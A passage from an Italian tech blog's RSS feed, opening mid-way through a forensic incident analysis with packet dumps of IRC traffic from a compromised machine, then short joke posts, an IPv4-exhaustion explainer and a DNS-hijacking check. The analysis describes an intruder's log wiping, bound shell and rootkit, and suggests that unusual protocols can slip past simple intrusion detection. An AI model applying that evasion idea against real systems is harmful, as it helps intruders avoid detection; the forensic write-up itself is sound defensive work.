0x0000   4500 0073 bddb 4000 3306 49d4 cefc c0c3        E..s..@.3.I&#8230;..<br />
0x0010   c0a8 641c 15b3 8025 c7a5 b8fa fdbf cf97        ..d&#8230;.%&#8230;&#8230;..<br />
0x0020   5018 2000 7100 0000 3a7c 416e 4472 3334        P&#8230;q&#8230;:|AnDr34<br />
0x0030   7a7c 217e 4f6d 4272 3440 7668 6f73 742e        z|!~OmBr4@vhost.<br />
0x0040   6972 6336 2e73 6572 7665 722e 7462 2e6e        irc6.server.tb.n<br />
0x0050   676e 6574 2e69 7420 5052 4956 4d53 4720        gnet.it.PRIVMSG.<br />
0x0060   2362 6f62 7a20 3a31 3720 7475 2076 657a        #bobz.:17.tu.vez<br />
0x0070   3f0d 0a                                        ?..</p>
<p>18:41:28.584475 irc-1.stealth.net.5555 > 192.168.100.28.32805: P<br />
47289:47335(46) ack 6979 win 8192 (DF)<br />
0x0000   4500 0056 d30e 4000 3306 34be cefc c0c3        E..V..@.3.4&#8230;..<br />
0x0010   c0a8 641c 15b3 8025 c7a5 b945 fdbf cf97        ..d&#8230;.%&#8230;E&#8230;.<br />
0x0020   5018 2000 5425 0000 3a62 6f62 7a60 217e        P&#8230;T%..:bobz`!~<br />
0x0030   6168 6161 4069 7263 362e 7668 6f73 742e        ahaa@irc6.vhost.<br />
0x0040   6c61 2050 5249 564d 5347 2023 626f 627a        la.PRIVMSG.#bobz<br />
0x0050   203a 3135 0d0a                                 .:15..</p>
<p>&#8212;[ Conclusion</p>
<p>Standing by attack topology and modus operandi of the attacker we can<br />
suppose that the attacker is just a script-kiddie that wasn&#8217;t searching<br />
for any reserved information but he needed only a system to make IRC<br />
WAR. The attack was brutal and after it the system was full of anomalous<br />
things: the log was cleaned using the command &#8220;rm&#8221; by a script, was<br />
installed a non supported protocol by default (IPv6), the shell binded<br />
on a port not used on that system and so on.<br />
All that anomalies allow us to have notice of an intruder in the system<br />
that could be eventually pursued by law<br />
We was able to analyze all the sessions because are in clear text, the<br />
only one not analyzed is the ssh one.<br />
Teorically we can decode also that protocol because there<br />
are either the public and private keys in the rootkit.</p>
<p>&#8212;[ Notes</p>
<p>With a dumb IDS implementations the presence of unusual protocol should<br />
be a bypassing method of the IDS because if the protocol is unknown to<br />
IDS it doesn&#8217;t match any of the criteria implemented so no rules in the<br />
IDS can give us a response and no alarm is reported.</p>
<p>To decode the log in pcap format we used a series of tool for packet<br />
analysis: tcpdump, ethereal and tcpflow; standard shell tools for log<br />
parsing: strings, awk, ecc; and the whois to obtain informations on<br />
adress information</p>
<p>&#8212;[ The authors </p>
<p>Luca Memini<br />
Francesco Perna</mss></nop></p><p>The post <a href="https://www.memini.it/incident-analysis/">Incident Analysis</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.memini.it/incident-analysis/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Informatici (ir)responsabili!</title>
		<link>https://www.memini.it/informatici-irresponsabili/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=informatici-irresponsabili</link>
					<comments>https://www.memini.it/informatici-irresponsabili/#comments</comments>
		
		<dc:creator><![CDATA[luca]]></dc:creator>
		<pubDate>Fri, 26 Feb 2010 17:01:06 +0000</pubDate>
				<category><![CDATA[nerd]]></category>
		<category><![CDATA[ignoranti]]></category>
		<category><![CDATA[informatica]]></category>
		<guid isPermaLink="false">http://www.memini.it/?p=1243</guid>

					<description><![CDATA[<p>amico: &#8220;Che I.P. diamo al nuovo firewall per fare dei test?&#8221; responsabile IT: &#8220;Ma mettigli il 300&#8221;</p>
<p>The post <a href="https://www.memini.it/informatici-irresponsabili/">Informatici (ir)responsabili!</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></description>
										<content:encoded><![CDATA[<p><strong>amico</strong>: <em>&#8220;Che I.P. diamo al nuovo firewall per fare dei test?&#8221;</em><br />
<strong>responsabile IT</strong>: <em>&#8220;Ma mettigli il 300&#8221;</em></p><p>The post <a href="https://www.memini.it/informatici-irresponsabili/">Informatici (ir)responsabili!</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.memini.it/informatici-irresponsabili/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
		<item>
		<title>Freddure</title>
		<link>https://www.memini.it/freddure/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=freddure</link>
					<comments>https://www.memini.it/freddure/#respond</comments>
		
		<dc:creator><![CDATA[luca]]></dc:creator>
		<pubDate>Mon, 22 Feb 2010 11:08:56 +0000</pubDate>
				<category><![CDATA[nerd]]></category>
		<category><![CDATA[bofh]]></category>
		<category><![CDATA[informatica]]></category>
		<category><![CDATA[rofl]]></category>
		<guid isPermaLink="false">http://www.memini.it/?p=1210</guid>

					<description><![CDATA[<p>amico: Non naviga bene il mio pc, mi sa che dovrÃ² reinstallare Internet. Io: Tutta Internet?!?!?!</p>
<p>The post <a href="https://www.memini.it/freddure/">Freddure</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></description>
										<content:encoded><![CDATA[<p><strong>amico</strong>: <em>Non naviga bene il mio pc, mi sa che dovrÃ² reinstallare Internet.</em><br />
<strong>Io</strong>: <em>Tutta Internet?!?!?!</em></p><p>The post <a href="https://www.memini.it/freddure/">Freddure</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.memini.it/freddure/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Dialogo tra informatici</title>
		<link>https://www.memini.it/dialogo-tra-informatici/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=dialogo-tra-informatici</link>
					<comments>https://www.memini.it/dialogo-tra-informatici/#comments</comments>
		
		<dc:creator><![CDATA[luca]]></dc:creator>
		<pubDate>Tue, 16 Feb 2010 22:51:52 +0000</pubDate>
				<category><![CDATA[nerd]]></category>
		<category><![CDATA[bofh]]></category>
		<category><![CDATA[informatica]]></category>
		<category><![CDATA[rofl]]></category>
		<guid isPermaLink="false">http://www.memini.it/?p=1207</guid>

					<description><![CDATA[<p>newbie: Come faccio a cercare su tutta internet una parola? mainman: wget 255.255.255.255 &#124; grep parola</p>
<p>The post <a href="https://www.memini.it/dialogo-tra-informatici/">Dialogo tra informatici</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></description>
										<content:encoded><![CDATA[<p><strong>newbie</strong>: <em>Come faccio a cercare su tutta internet una parola?</em><br />
<strong>mainman</strong>: <em>wget 255.255.255.255 | grep parola</em></p><p>The post <a href="https://www.memini.it/dialogo-tra-informatici/">Dialogo tra informatici</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.memini.it/dialogo-tra-informatici/feed/</wfw:commentRss>
			<slash:comments>3</slash:comments>
		
		
			</item>
		<item>
		<title>Mamma non ci sono piÃ¹ IP per colazione!!!</title>
		<link>https://www.memini.it/mamma-non-ci-sono-piu-ip-per-colazione/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=mamma-non-ci-sono-piu-ip-per-colazione</link>
					<comments>https://www.memini.it/mamma-non-ci-sono-piu-ip-per-colazione/#comments</comments>
		
		<dc:creator><![CDATA[luca]]></dc:creator>
		<pubDate>Fri, 29 Jan 2010 11:23:12 +0000</pubDate>
				<category><![CDATA[nerd]]></category>
		<category><![CDATA[indirizzi]]></category>
		<category><![CDATA[informatica]]></category>
		<category><![CDATA[ip]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[passione]]></category>
		<guid isPermaLink="false">http://www.memini.it/?p=1128</guid>

					<description><![CDATA[<p>L&#8217;altro giorno leggevo sul blog di Emiliano Bruni un interessante articolo sulla carenza degli indirizzi IP. Ma andiamo per gradi,</p>
<p>The post <a href="https://www.memini.it/mamma-non-ci-sono-piu-ip-per-colazione/">Mamma non ci sono piÃ¹ IP per colazione!!!</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></description>
										<content:encoded><![CDATA[<p><img decoding="async" class="aligncenter size-full wp-image-1135" title="IPv4-Address-Space-300x219" src="https://www.memini.it/wp-content/uploads/2010/01/IPv4-Address-Space-300x219.png" alt="" width="300" height="219" />L&#8217;altro giorno leggevo sul blog di <a href="http://blog.ebruni.it/blog/" target="_blank">Emiliano Bruni</a> un interessante <a href="http://blog.ebruni.it/blog/2010/01/indirizzi-ipv4-siamo-agli-sgoccioli.html" target="_blank">articolo</a> sulla carenza degli indirizzi IP.</p>
<p>Ma andiamo per gradi, che cos&#8217;Ã¨ un indirizzo IP!?!? Per citare Wikipedia (si per ora <a href="http://it.wikipedia.org/wiki/Andrew_Stuart_Tanenbaum" target="_blank">Tanenbaum</a> lasciamolo tranquillo)</p>
<blockquote><p>Un <strong>Indirizzo IP</strong> Ã¨ un numero che identifica univocamente un dispositivo collegato a una <a title="Rete informatica" href="http://it.wikipedia.org/wiki/Rete_informatica" target="_blank">rete informatica</a> che comunica utilizzando lo standard IP (<a title="Internet Protocol" href="http://it.wikipedia.org/wiki/Internet_Protocol" target="_blank">Internet Protocol</a>).</p></blockquote>
<p>Per farla semplice, possiamo paragonare un indirizzo IP ad un numero di telefono, se da casa mia voglio chiamare qualcuno per parlarci dovrÃ² conoscere il suo numero di telefono, e su internet succede esattamente lo stesso solo che Ã¨ un pÃ² &#8220;nascosto&#8221; alla vista degli utenti&#8230; ma la logica Ã¨ questa, semplice no?</p>
<p>Il problema nasce quando i numeri di telefono assegnabili sono inferiori alle persone che chiedono di avere un telefono&#8230; ed Ã¨ quello che sta succedendo su Internet, e recente la notizia che lo <a href="http://www.iana.org/" target="_blank">IANA</a> (Internet Assigned Numbers Authority) ha iniziato ad assegnare quelle classi che erano marcate come &#8220;NON ALLOCATE&#8221; e che venivano tenute da parte per momenti di &#8220;crisi&#8221;.<br />
Come possiamo vedere da<a href="http://www.iana.org/assignments/ipv4-address-space/" target="_blank"> questo documento</a> a gennaio 2010 e stata assegnata ad <a href="http://www.apnic.net/" target="_blank">APNIC</a> la classe 1.x.x.x ! (per la gioia degli utenti Fastweb dell&#8217;area di Milano che inizieranno ad avere collisioni&#8230; )</p>
<p>SarÃ  ora di accellerare il passaggio a <a href="http://it.wikipedia.org/wiki/IPv6" target="_blank">IPv6</a> e dobbiamo farlo in fretta per salvare Alice, Bob e Carl !!! ;)</p>
<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 141px; width: 1px; height: 1px;">
<h3 class="r"><a class="l" onmousedown="return clk(this.href,'','','res','2','','0CA0QFjAB')" href="http://www.iana.org/"><em>Internet Assigned Numbers Authority</em></a></h3>
<p><span class="std nobr"> </span></div><p>The post <a href="https://www.memini.it/mamma-non-ci-sono-piu-ip-per-colazione/">Mamma non ci sono piÃ¹ IP per colazione!!!</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.memini.it/mamma-non-ci-sono-piu-ip-per-colazione/feed/</wfw:commentRss>
			<slash:comments>4</slash:comments>
		
		
			</item>
		<item>
		<title>Noooooooooooooooo! CrASH! :&#124;</title>
		<link>https://www.memini.it/noooooooooooooooo-crash/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=noooooooooooooooo-crash</link>
					<comments>https://www.memini.it/noooooooooooooooo-crash/#respond</comments>
		
		<dc:creator><![CDATA[luca]]></dc:creator>
		<pubDate>Fri, 18 Dec 2009 09:36:46 +0000</pubDate>
				<category><![CDATA[me?!]]></category>
		<category><![CDATA[nerd]]></category>
		<category><![CDATA[informatica]]></category>
		<category><![CDATA[linux]]></category>
		<guid isPermaLink="false">http://www.memini.it/?p=1056</guid>

					<description><![CDATA[<p>Due righe veloci veloci per comunicarVi che a causa di un crash di 2 dischi del mio fidato raid5 ho</p>
<p>The post <a href="https://www.memini.it/noooooooooooooooo-crash/">Noooooooooooooooo! CrASH! :|</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>Due righe veloci veloci per comunicarVi che a causa di un crash di 2 dischi del mio fidato raid5 ho perso tutte le e-mail dalle ore 06:30 del 16/12/09 alle 20:00 (circa) del 17/12/09&#8230;.</p>
<p>Un minuto di silenzio per ricordare i dati cosÃ¬ prematuramente scomparsi..</p><p>The post <a href="https://www.memini.it/noooooooooooooooo-crash/">Noooooooooooooooo! CrASH! :|</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.memini.it/noooooooooooooooo-crash/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Telecom fa hijacking delle richieste dns?</title>
		<link>https://www.memini.it/telecom-fa-hijacking-delle-richieste-dns/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=telecom-fa-hijacking-delle-richieste-dns</link>
					<comments>https://www.memini.it/telecom-fa-hijacking-delle-richieste-dns/#respond</comments>
		
		<dc:creator><![CDATA[luca]]></dc:creator>
		<pubDate>Thu, 07 Aug 2008 19:39:42 +0000</pubDate>
				<category><![CDATA[nerd]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[informatica]]></category>
		<category><![CDATA[telecom]]></category>
		<category><![CDATA[virgilio]]></category>
		<guid isPermaLink="false">http://www.memini.it/?p=324</guid>

					<description><![CDATA[<p>chi di voi ha una connessione telecom faccia la prova di aprire un sito che non esiste. Io mi sono</p>
<p>The post <a href="https://www.memini.it/telecom-fa-hijacking-delle-richieste-dns/">Telecom fa hijacking delle richieste dns?</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>chi di voi ha una connessione telecom faccia la prova di aprire un sito che non esiste.<br />
Io mi sono ritrovato dirottato su una pagina di ricerca di <strong>virgilio</strong>!!!!!!</p>
<p>Ho dato un&#8217;occhiata veloce e ho notato che il pasticcio lo fanno a livello DNS, infatti:</p>
<p><code><br />
dreams@nirvana:~$ nslookup fakharfauj.org nsp-mi2.interbusiness.it.<br />
Server:         nsp-mi2.interbusiness.it.<br />
Address:        85.37.17.4#53</code></p>
<p>Non-authoritative answer:<br />
Name:   fakharfauj.org<br />
Address: 212.48.8.140</p>
<p>dreams@nirvana:~$ nslookup fakharfauj.org 151.1.2.1<br />
Server:         151.1.2.1<br />
Address:        151.1.2.1#53</p>
<p>** server can&#8217;t find fakharfauj.org: NXDOMAIN</p>
<p>Ok, questa prova vale solo per il DNS 85.37.17.4&#8230; appena posso vedo di approfondire la cosa!</p>
<h6>Aggiornamento dell&#8217;8/8/08</h6>
<p>La cosa era giÃ  nota da 1 mese&#8230; arrivo sempre in ritardo!<br />
per dettagli leggete questo <a href="http://punto-informatico.it/2350565/PI/Brevi/dns-alice-parla-telecom-italia.aspx">articolo</a> di punto informatico.</p><p>The post <a href="https://www.memini.it/telecom-fa-hijacking-delle-richieste-dns/">Telecom fa hijacking delle richieste dns?</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.memini.it/telecom-fa-hijacking-delle-richieste-dns/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Ubuntu o Debian?</title>
		<link>https://www.memini.it/ubuntu-o-debian/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ubuntu-o-debian</link>
					<comments>https://www.memini.it/ubuntu-o-debian/#respond</comments>
		
		<dc:creator><![CDATA[luca]]></dc:creator>
		<pubDate>Tue, 05 Aug 2008 13:24:22 +0000</pubDate>
				<category><![CDATA[Lavoratore]]></category>
		<category><![CDATA[nerd]]></category>
		<category><![CDATA[informatica]]></category>
		<category><![CDATA[linux]]></category>
		<guid isPermaLink="false">http://www.memini.it/?p=317</guid>

					<description><![CDATA[<p>Ubuntu Ã¨ un&#8217;antica parola africana che significa &#8220;non so installare Debian&#8220; (Gentilmente concessa dal collega DBA Eugenio )</p>
<p>The post <a href="https://www.memini.it/ubuntu-o-debian/">Ubuntu o Debian?</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></description>
										<content:encoded><![CDATA[<blockquote><p>Ubuntu Ã¨ un&#8217;antica parola africana che significa <br />&#8220;<strong>non so installare Debian</strong>&#8220;</p></blockquote>
<address style="text-align: center;">(Gentilmente concessa dal collega DBA Eugenio )</address><p>The post <a href="https://www.memini.it/ubuntu-o-debian/">Ubuntu o Debian?</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.memini.it/ubuntu-o-debian/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
